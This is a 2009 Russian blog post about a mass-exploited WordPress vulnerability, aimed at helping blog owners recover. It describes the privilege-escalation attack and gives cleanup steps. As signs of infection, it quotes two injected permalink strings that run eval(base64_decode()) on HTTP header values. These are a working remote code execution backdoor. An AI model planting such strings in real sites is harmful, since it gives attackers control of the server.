пятница, 11 сентября 2009 г.

Критическая уязвимость блогов на Wordpress

Думаю, что подавляющее большинство владельцев блогов на движке Wordpress уже слышали о критической уязвимости, от которой пострадали уже десятки тысяч блогов в мире . Среди них немало известных.

Сегодня имел несколько разговоров, в ходе которых выяснилось, что подавляющее большинство владельцев блогов на Wordpress, которые вовремя не проапгрейдились до последней версии - имеют проблему с зараженным сайтом.


Как происходит заражение? Сначала происходит регистрация нового пользователя. Затем через дыру в безопасности движка этот пользователь получает права администратора и контроль над сайтом. Далее начинает потихоньку добавлять спам и свои ссылки на внешний контент в архивных записях блога.

О проблеме могут не переживать только те, у кого последняя версия движка - Wordpress 2.84. Там дыра залатана.

Хотя о проблеме стало известно еще 5 сентября, большинство владельцев блогов сих пор ничего не сделали во избежание проблем.

Существует несколько признаков, свидетельствующих о взломе блога. Первая - это увеличение количества администраторов блога. Причем злоумышленники используют JavaScript, чтобы скрыть нового администратора. Если сайт заражен, то вы увидите только увеличение количества администраторов, и не увидите их в списке админов.

Второй признак - изменение в структуре постоянных ссылок (permalinks). Там может появиться вот такой код:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или такой:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Что делать? Первое - если никаких признаков взлома нет - срочно проапгрейдитись до самой свежей версии Wordpress.

Если признаки взлома есть, то:
1. Зайти в админпанель в раздел Setting, далее - Permalinks и уничтожить лишний код (указан выше).

2. Выяснить порядковый номер последнего зарегистрированного на блоге пользователя. Самый простой вариант - это добавить общее количество всех пользователей по разделам (например, читатели, авторы, админы). Далее зайти в редактирование данных любого из пользователей и в командной строке, где прописывается "ID =", вставляем полученную вами цифру, но увеличиваем на единицу. По идее вы можете попасть на вашего нового админа. Если этого не произошло, а там какой-то другой пользователь, увеличиваем
ID еще не единицу, и так продолжайте, пока не дойдете до него.

3. В профайле этого пользователя (в поле ИМЯ) вы увидите странный код (javascript) и права админа. Необходимо удалить сначала код, далее снизить его в правах до простого пользователя.

4. Выделите списку пользователей. Теперь вы можете спокойно посмотреть вашего вредителя среди других пользователей. Нашли? Удаляйте.

Лишь после этого можно устанавливать новый Wordpress 2.84. Относительно вашей базы данных. Если в ней уже успели покопаться, и некоторые постоянные ссылки были заменены - придется вручную править базу данных. Или надеяться на какую-то утилиту, которую выложат на wordpress.org.

Постовой:
Иногда, когда устаёшь читать о том, как можно заработать кучу денег в интернете, хочется почитать что нибудь действительно полезное от настоящего профессионала. Читая блог Записки программиста реально понимаешь, что автор блога "рубит" во многих вещах и на его мнение можно положиться.


Так же хотел сообщить всем, что открылась новая социальная сеть для блоггеров, и там тоже можно узнать много полезного и интересного, как профессионалу, так и новичку. 

Комментариев нет:

Отправить комментарий